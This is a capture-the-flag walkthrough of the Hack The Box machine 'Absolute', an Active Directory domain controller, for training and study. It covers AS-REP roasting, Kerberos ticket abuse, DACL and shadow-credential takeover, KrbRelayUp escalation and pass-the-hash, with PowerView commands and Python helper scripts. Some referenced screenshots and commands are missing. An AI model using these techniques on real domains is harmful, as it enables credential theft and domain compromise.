In this post, I would like to share a walkthrough of the Absolute machine from Hack The Box.
The machine is rated Insane on Hack The Box.
- What will you gain from the Absolute machine?
- Information Gathering on Absolute Machine
- Enumerate the username and password
- Brute-force a valid Active Directory account using Kerbrute
- BloodHound analysis
- Using the Python script to obtain the foothold on an Absolute Machine
- Escalate to root privileges
What will you gain from the Absolute machine?
For the user flag, you need to work out the username format used in the domain, AS-REP roast the accounts that have Kerberos pre-authentication disabled, and crack the returned hash to get a first credential. An LDAP enumeration with that account yields a second credential. With it, we use Linux tooling (Impacket's owner- and DACL-editing scripts) to add the user m.lovegod to the Network Audit group on the domain controller.
For the root flag, you need a handful of tools, namely KrbRelayUp, Rubeus and RunasCs, to finally obtain the Administrator account's NTLM hash, which we then pass to evil-winrm.
Information Gathering on Absolute Machine
Once the VPN connection is up (the .ovpn profile is downloaded from Hack The Box), we can start information gathering with nmap. The output below is from a default top-1000-port script and version scan; a full-port scan, nmap -sC -sV -p- -Pn <IP Address>, is worth running afterwards to catch any service above that range.
┌─[darknite@parrot]─[~/Document/htb/Absolute]
└──╼ $sudo nmap -sC -sV 10.10.11.181 -oA initial
[sudo] password for darknite:
Starting Nmap 7.92 ( https://nmap.org ) at 2023-04-04 06:34 EDT
Nmap scan report for 10.10.11.181
Host is up (0.17s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Absolute
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-04 17:34:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
|_ssl-date: 2023-04-04T17:35:45+00:00; +7h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-04T17:35:46+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-04-04T17:35:45+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: absolute.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.absolute.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.absolute.htb
| Not valid before: 2022-06-09T08:14:24
|_Not valid after: 2023-06-09T08:14:24
|_ssl-date: 2023-04-04T17:35:46+00:00; +7h00m00s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-04-04T17:35:39
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
There are several ports worth investigating (DNS, Kerberos, LDAP and SMB, all pointing at a domain controller named dc.absolute.htb). Also note the clock skew of about seven hours between the DC and our machine; Kerberos rejects requests outside a five-minute window, so this will matter later. Let's look at the website first.
There is nothing of interest on the website pages themselves.
Therefore, let's collect all the hero images from the site and look at them more closely.
Enumerate the username and password
The screenshot above shows the author of the image we downloaded earlier: the Author field in the image metadata (a tool such as exiftool shows it) names the person who produced the image.
Collecting the author names from all the hero images gives us a list of people, from which we build candidate usernames in the format the domain uses.
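As an added example (not code from the original post), here is how the recovered author list can be turned into a kerbrute-ready username list. The names in it are constructed placeholders; only the f.last pattern is known from this domain (d.klay), the other patterns are included for engagements where the format is still unknown.

```python
# Added example for this walkthrough, not code from the original post.
# Builds candidate Active Directory usernames from full names recovered
# from image metadata (for example an "Author" field). The names used in
# __main__ are constructed placeholders; "Donald Klay" is only assumed so
# that the output contains the d.klay account the post goes on to use.
from typing import Callable, Dict, Iterable, List, Optional, Tuple

# Username patterns commonly seen in AD. The Absolute domain uses "f.last"
# (d.klay), so that is the default; the rest are there for other domains.
FORMATS: Dict[str, Callable[[str, str], str]] = {
    "f.last": lambda f, l: f"{f[0]}.{l}",
    "first.last": lambda f, l: f"{f}.{l}",
    "flast": lambda f, l: f"{f[0]}{l}",
    "firstl": lambda f, l: f"{f}{l[0]}",
    "first": lambda f, l: f,
}


def split_name(full_name: str) -> Optional[Tuple[str, str]]:
    """Return (first, last) in lowercase, or None if there is no surname.

    Middle names are dropped and hyphens/apostrophes in surnames removed,
    because sAMAccountNames are normally created without them.
    """
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        return None
    first, last = parts[0], parts[-1]
    last = last.replace("-", "").replace("'", "")
    return first, last


def candidates(full_names: Iterable[str],
               formats: Iterable[str] = ("f.last",)) -> List[str]:
    """Generate a de-duplicated username list, in input order, for kerbrute."""
    out: List[str] = []
    seen = set()
    for name in full_names:
        parsed = split_name(name)
        if parsed is None:
            continue  # single-word authors such as "Admin" give no pattern
        first, last = parsed
        for fmt in formats:
            user = FORMATS[fmt](first, last)
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Constructed sample of "Author" values pulled from the hero images.
    authors = ["James Example", "Mary Anne Sample", "Donald Klay",
               "Sarah O'Neil", "Admin"]
    for user in candidates(authors):
        print(user)
```

Feed the printed list to kerbrute's userenum mode; if no format is known yet, pass several keys from FORMATS and let kerbrute tell you which pattern produces valid accounts.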
┌──[darknite@parrot]─[/opt/CrackMapExec]
└──╼ $poetry run crackmapexec smb absolute.htb
SMB absolute.htb 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:absolute.htb) (signing:True) (SMBv1:False)
The crackmapexec output above gives the SMB fingerprint of the machine: Windows build 17763 (Server 2019), hostname DC, domain absolute.htb, SMB signing required and SMBv1 disabled.
Running Impacket's GetNPUsers.py (AS-REP roasting) against our candidate usernames returns an AS-REP hash for every account that exists and has Kerberos pre-authentication disabled.
The hash should look something like the one shown above.
Cracking it with John the Ripper gives us the password for d.klay.
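The AS-REP hash format is worth understanding before handing it to a cracker. The following is an added example, not from the original post, that parses the output of GetNPUsers.py: it pulls out the roastable accounts together with the hashcat mode to use, and treats the "doesn't have UF_DONT_REQUIRE_PREAUTH set" lines as confirmation that those usernames exist. The sample output and its hex values are constructed.

```python
# Added example, not from the original post: parse the output of Impacket's
# GetNPUsers.py so that AS-REP hashes can be handed to a cracker and the
# remaining lines reused as a crude user-existence check. The sample output
# is constructed; the hex material is filler, not a real hash.
import re
from typing import Dict, List, Optional

# RC4 (etype 23) AS-REP hash as written by GetNPUsers.py: the hashcat form
# carries the etype, the john form omits it. AES (etype 17/18) hashes use a
# different layout and are deliberately not handled here.
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?:(?P<etype>\d+)\$)?(?P<user>[^@$]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)
PREAUTH_RE = re.compile(r"User (?P<user>\S+) doesn't have UF_DONT_REQUIRE_PREAUTH set")
UNKNOWN_MARKER = "KDC_ERR_C_PRINCIPAL_UNKNOWN"

HASHCAT_MODE_RC4_ASREP = 18200  # hashcat: "Kerberos 5, etype 23, AS-REP"


def parse_asrep_hash(line: str) -> Optional[Dict[str, object]]:
    """Return the fields of one AS-REP hash line, or None if it is not one."""
    m = ASREP_RE.match(line.strip())
    if not m:
        return None
    etype = int(m.group("etype")) if m.group("etype") else 23  # john form is RC4
    return {
        "user": m.group("user"),
        "realm": m.group("realm"),
        "etype": etype,
        "hashcat_mode": HASHCAT_MODE_RC4_ASREP if etype == 23 else None,
        "hash": m.group(0),
    }


def triage(output: str) -> Dict[str, object]:
    """Split GetNPUsers output into roastable users, users that exist but
    enforce pre-auth, and a count of names the KDC did not recognise."""
    roastable: List[Dict[str, object]] = []
    preauth_required: List[str] = []
    unknown = 0
    for line in output.splitlines():
        parsed = parse_asrep_hash(line)
        if parsed:
            roastable.append(parsed)
            continue
        m = PREAUTH_RE.search(line)
        if m:
            preauth_required.append(m.group("user"))
        elif UNKNOWN_MARKER in line:
            unknown += 1
    return {"roastable": roastable, "preauth_required": preauth_required, "unknown": unknown}


# Constructed sample: one roastable account, two valid accounts with
# pre-auth enforced, one name the KDC does not know.
SAMPLE_OUTPUT = """\
[-] User j.example doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$d.klay@ABSOLUTE.HTB:0123456789abcdef0123456789abcdef$deadbeef00112233445566778899aabbccddeeff
[-] User m.sample doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
"""

if __name__ == "__main__":
    result = triage(SAMPLE_OUTPUT)
    for h in result["roastable"]:
        print(f"{h['user']}@{h['realm']} etype {h['etype']} -> hashcat -m {h['hashcat_mode']}")
    print("exist, pre-auth required:", result["preauth_required"])
    print("unknown principals:", result["unknown"])
```

The "doesn't have UF_DONT_REQUIRE_PREAUTH set" lines are a useful side effect: the KDC only says that for accounts that exist, so GetNPUsers doubles as a username check even when nothing is roastable.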
Brute-force a valid Active Directory account using Kerbrute
We use kerbrute's userenum mode to check which of our candidate usernames exist in the domain.
The first run only shows that the tool starts correctly on our attacking machine.
It initially fails because the domain had not yet been mapped to the DC's IP address in /etc/hosts.
Even with that fixed, the username list turned up nothing beyond the accounts we already had.
Authenticating as d.klay over SMB with crackmapexec also fails with STATUS_ACCOUNT_RESTRICTION, which indicates a logon restriction on the account; the practical reading here is that NTLM authentication is refused and Kerberos must be used instead.
Kerberos only tolerates a clock skew of five minutes, and the scan showed the DC roughly seven hours ahead of us, so we first sync our clock to the DC with ntpdate (or run the tools under faketime).
Requesting a TGT for d.klay (Impacket's getTGT.py does this) gives us a d.klay.ccache ticket.
Running ldapsearch with that ticket, we find the password for the svc_smb account in the directory data.
We request a ticket for svc_smb the same way and save the .ccache file.
Then we export it in the KRB5CCNAME environment variable so the other tools authenticate with Kerberos.
With smbclient, using Kerberos authentication, we can connect to the machine.
The Shares share is accessible.
Two files are stored in the shared directory.
Let's download them to the attacking machine.
BloodHound analysis
We collect the domain data and get BloodHound running with the commands above.
BloodHound shows that m.lovegod is the owner of the Network Audit group but not a member of it. Ownership of an object implies the right to rewrite its DACL, so m.lovegod can grant itself full control of the group and then add itself as a member. Network Audit in turn has GenericWrite over winrm_user. GenericWrite on a user object includes write access to its msDS-KeyCredentialLink attribute, so in the next stage we use pyWhisker to add a new KeyCredential (a shadow credential) for winrm_user. With the resulting certificate, gettgtpkinit.py requests a TGT for winrm_user over Kerberos PKINIT, without ever knowing that account's password.
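To make the chain concrete, here is an added example (not from the original post, and not BloodHound's own code) that encodes the relationships BloodHound reported as a small graph and searches it for an abusable path from m.lovegod to winrm_user, annotating each hop with the Linux tooling used later in the post. The Domain Users memberships and the d.klay/svc_smb entries are assumed filler; the two edges that matter are the ones the post describes.

```python
# Added example, not part of the original post: a minimal version of the
# reasoning BloodHound does for the Absolute path. The edges are constructed
# from what the post describes (m.lovegod owns Network Audit; the group has
# GenericWrite over winrm_user); the Domain Users, d.klay and svc_smb entries
# are assumed filler.
from collections import deque
from typing import Dict, List, Optional, Tuple

Edge = Tuple[str, str, str]  # (source, relationship, target)

NODE_TYPES: Dict[str, str] = {
    "d.klay": "User",
    "svc_smb": "User",
    "m.lovegod": "User",
    "winrm_user": "User",
    "Network Audit": "Group",
    "Domain Users": "Group",
}

EDGES: List[Edge] = [
    ("d.klay", "MemberOf", "Domain Users"),
    ("svc_smb", "MemberOf", "Domain Users"),
    ("m.lovegod", "MemberOf", "Domain Users"),
    ("m.lovegod", "Owns", "Network Audit"),      # owner, but NOT a member
    ("Network Audit", "GenericWrite", "winrm_user"),
]

# Relationships that let the source take control of a target of that type.
GROUP_TAKEOVER = {"Owns", "WriteOwner", "WriteDacl", "GenericAll", "AddMember", "AddSelf"}
USER_TAKEOVER = {"Owns", "WriteOwner", "WriteDacl", "GenericAll", "GenericWrite",
                 "AddKeyCredentialLink", "ForceChangePassword"}


def abuse_for(rel: str, target_type: str) -> str:
    """How one edge on the path is turned into access, with the tooling the post uses."""
    if rel == "MemberOf":
        return "already a member, rights are inherited"
    if target_type == "Group":
        if rel == "WriteOwner":
            return "take ownership with owneredit.py, then rewrite the DACL and add yourself"
        if rel == "Owns":
            return ("owner has implicit WriteDacl: grant FullControl with dacledit.py, "
                    "then add yourself with net rpc group addmem")
        return "add yourself to the group with net rpc group addmem"
    if target_type == "User":
        if rel == "ForceChangePassword":
            return "reset the password (destructive and noisy)"
        return ("write msDS-KeyCredentialLink with pywhisker (shadow credential), "
                "then request a TGT with gettgtpkinit.py")
    return "no known abuse in this example"


def can_traverse(rel: str, target_type: str) -> bool:
    if rel == "MemberOf":
        return True
    if target_type == "Group":
        return rel in GROUP_TAKEOVER
    if target_type == "User":
        return rel in USER_TAKEOVER
    return False


def find_path(start: str, goal: str, edges: List[Edge] = EDGES,
              node_types: Dict[str, str] = NODE_TYPES) -> Optional[List[Tuple[Edge, str]]]:
    """Breadth-first search for the shortest abusable chain from start to goal."""
    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == goal:
            return path
        for edge in edges:
            src, rel, dst = edge
            if src != node or dst in seen:
                continue
            ttype = node_types.get(dst, "Unknown")
            if not can_traverse(rel, ttype):
                continue
            seen.add(dst)
            queue.append((dst, path + [(edge, abuse_for(rel, ttype))]))
    return None  # no abusable chain from this principal


if __name__ == "__main__":
    path = find_path("m.lovegod", "winrm_user")
    if path is None:
        print("no path")
    else:
        for (src, rel, dst), how in path:
            print(f"{src} -[{rel}]-> {dst}: {how}")
```

The point of the traversal rule is the one the post relies on: an Owns edge into a group is treated as good as membership, because the owner can rewrite the DACL and add itself, so the search continues from the group even though m.lovegod is not a member yet.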
Using the Python script to obtain the foothold on an Absolute Machine
There are two ways to obtain a foothold on the machine, depending on the attacker's tooling: from a Windows host with PowerView and the ActiveDirectory module, or from Linux with Impacket.
# PowerView: as owner of the group, grant m.lovegod full rights on it
$dc_domain = "ABSOLUTE.HTB"
$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('ABSOLUTE.HTB\m.lovegod', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights All -DomainController DC.ABSOLUTE.HTB -PrincipalIdentity "m.lovegod"
# ActiveDirectory module: add m.lovegod to the group
Add-ADPrincipalGroupMembership -Identity m.lovegod -MemberOf 'Network Audit' -Credential $Cred -Server DC.ABSOLUTE.HTB
# PowerView: confirm the membership change
Get-DomainGroupMember -Identity 'Network Audit' -Domain $dc_domain -DomainController DC.ABSOLUTE.HTB -Credential $Cred
The commands above are for a Windows attacking host (Add-DomainObjectAcl and Get-DomainGroupMember come from PowerView, Add-ADPrincipalGroupMembership from the ActiveDirectory module). In my case, I'm working from Linux, so I use Impacket's scripts to obtain the foothold.
First we run the owner-editing script shown above (Impacket's owneredit.py), which lets us set m.lovegod as the owner of the Network Audit group.
Next we use dacledit.py to modify the group's DACL and grant m.lovegod full control over it.
We can then read the DACL back with dacledit.py to verify that the new ACE has been applied.
The command above adds m.lovegod to the Network Audit group.
Normally we would then run pyWhisker to add the shadow credential and gettgtpkinit.py, as shown above, to create the TGT for winrm_user.
Then we export the resulting ticket in KRB5CCNAME.
Finally, we get a shell as winrm_user by running evil-winrm with Kerberos authentication against the Absolute machine.
We can read the user flag by running the "cat user.txt" command.
Escalate to root privileges
Enumerating group membership shows that the Administrator account sits in Domain Admins, so that is the obvious target. Since we already have a shell on the domain controller, the plan is to escalate our privileges on it and then perform a full dump of NTDS.
After a while, we found a method that needs three tools, KrbRelayUp, Rubeus and RunasCs, all of which are available as pre-built binaries from SharpCollection.
The tool's prerequisite checks against the domain controller pass, and m.lovegod is one of the accounts that satisfies them.
Further detail on this privilege escalation technique can be found here.
Therefore, we use RunasCs.exe as shown above to run the Rubeus.exe command under m.lovegod's credentials, and use its output in the next step.
At last, we obtain an NTLM hash alongside the other hashes already collected.
We then run Impacket's secretsdump.py with it to dump the remaining hashes, including the Administrator's.
Passing the Administrator NTLM hash to evil-winrm (pass-the-hash with -H) gives us an administrative shell on the Windows machine.
We can read the root flag by typing the "type root.txt" command.